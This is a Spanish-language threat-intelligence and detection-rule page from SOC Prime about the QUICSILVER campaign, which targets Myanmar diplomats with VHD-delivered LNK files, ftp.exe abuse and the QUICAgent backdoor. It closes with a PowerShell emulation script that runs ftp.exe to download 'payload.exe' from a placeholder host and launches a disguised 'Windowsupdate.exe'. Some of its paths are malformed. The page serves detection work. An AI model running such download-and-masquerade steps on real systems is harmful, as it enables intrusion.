SOC Prime Bias: High

18 Aug 2026 06:27 UTC

Actor vinculado a China utiliza archivos VHD para atacar a diplomáticos de Myanmar

Author Photo
SOC Prime Team linkedin icon Seguir
Actor vinculado a China utiliza archivos VHD para atacar a diplomáticos de Myanmar
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Un actor de amenaza vinculado a China está atacando al personal del gobierno de Myanmar a través de una cadena de infección de múltiples etapas entregada mediante archivos de disco duro virtual (VHD). La campaña utiliza archivos LNK maliciosos para abusar de ftp.exe para la reconstrucción de la carga útil y despliega una puerta trasera personalizada basada en Go conocida como QUICAgent. El malware depende de Cloudflare Workers para la resolución dinámica de C2 y se comunica a través del protocolo QUIC.

Investigación

El equipo APT de Seqrite analizó muestras de VHD que contenían documentos señuelo e identificó archivos LNK maliciosos disfrazados como archivos PDF. La investigación descubrió una técnica de carga útil dividida en la que dos archivos se combinan con el comando copy para reconstruir un ejecutable. El análisis técnico del implante QUICAgent también reveló evasión de sandbox a través de hashing repetido SHA-256 y validación personalizada de certificado TLS.

Mitigación

Las organizaciones deben restringir la ejecución de archivos LNK no confiables y monitorear procesos secundarios sospechosos que involucren ftp.exe. Se recomiendan controles estrictos alrededor del uso de discos duros virtuales (VHD) y monitoreo de tráfico de red inusual sobre el puerto UDP 443 usando QUIC. Bloquear puntos finales maliciosos conocidos de Cloudflare Worker también puede interrumpir el mecanismo de resolución C2 de la campaña.

Respuesta

Si se detecta actividad de QUICSILVER, los sistemas afectados deben ser aislados inmediatamente para detener la exfiltración de datos y la comunicación C2. Los investigadores deben inspeccionar %LOCALAPPDATA% en busca del binario Windowsupdate.exe y revisar la carpeta de inicio del usuario en busca de SystemIn.lnk. Los registros de red también deben analizarse para detectar conexiones a dominios e IPs de C2 conocidos para determinar el alcance del compromiso.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Archivo LNK Posiblemente Malicioso con Doble Extensión (vía línea de comandos)

Equipo de SOC Prime
17 de agosto de 2026

Archivo con Doble Extensión Posiblemente Malicioso (vía creación de proceso)

Equipo de SOC Prime
17 de agosto de 2026

Se Realizó una Operación Manual o de Scripting en Carpetas Inusuales (vía línea de comandos)

Equipo de SOC Prime
17 de agosto de 2026

LOLBAS ftp (vía línea de comandos)

Equipo de SOC Prime
17 de agosto de 2026

Binario / Scripts Sospechosos en Ubicación de Autoinicio (vía evento de archivo)

Equipo de SOC Prime
17 de agosto de 2026

Ejecución Sospechosa desde Unidad Montada (vía auditoría)

Equipo de SOC Prime
17 de agosto de 2026

Abuso Posible del Dominio de Desarrollo de Cloudflare (vía dns)

Equipo de SOC Prime
17 de agosto de 2026

IOC (HashSha256) para detectar: Operación QUICSILVER: Actor con Nexo en China Ataca a Diplomáticos de Myanmar a través de Puerta Trasera Entregada por VHD

Reglas AI de SOC Prime
17 de agosto de 2026

IOC (SourceIP) para detectar: Operación QUICSILVER: Actor con Nexo en China Ataca a Diplomáticos de Myanmar a través de Puerta Trasera Entregada por VHD

Reglas AI de SOC Prime
17 de agosto de 2026

IOC (DestinationIP) para detectar: Operación QUICSILVER: Actor con Nexo en China Ataca a Diplomáticos de Myanmar a través de Puerta Trasera Entregada por VHD

Reglas AI de SOC Prime
17 de agosto de 2026

Detección de Comunicación C2 de QUICAgent [Conexión de Red de Windows]

Reglas AI de SOC Prime
17 de agosto de 2026

Uso Sospechoso de ftp.exe y Windowsupdate.exe para Ejecución de Malware [Creación de Proceso de Windows]

Reglas AI de SOC Prime
17 de agosto de 2026

Ejecución de Simulación

Prerrequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber aprobado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa y Comandos de Ataque: Un adversario pretende establecer una base imitando procesos legítimos del sistema. Primero, utiliza ftp.exe con un archivo script (-s:) para descargar una carga útil maliciosa, intentando mezclarse con tareas administrativas automatizadas. Simultáneamente, simulan el despliegue de un binario de «Actualización de Windows» (renombrado) para enmascarar la ejecución de la carga útil. Finalmente, utilizan un script de PowerShell diseñado para crear un .lnk archivo malicioso para asegurar la persistencia mediante la interacción del usuario.

  • Script de Prueba de Regresión:

    # 1. Simular descarga de script de FTP (Activación 1 Parte A)
    $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit"
    $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII
    Start-Process "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait
    
    # 2. Simular ejecución de Windowsupdate.exe (Activación 1 Parte B)
    # Nota: Esto asume que existe un archivo llamado Windowsupdate.exe o se está llamando
    # Para simulación, crearemos un archivo ficticio y lo ejecutaremos
    New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force
    Start-Process "$env:TEMPWindowsupdate.exe"
    
    # 3. Simular creación de LNK con PowerShell (Activación 2)
    Start-Process "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'"
  • Comandos de Limpieza:

    # Eliminar artefactos simulados
    Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue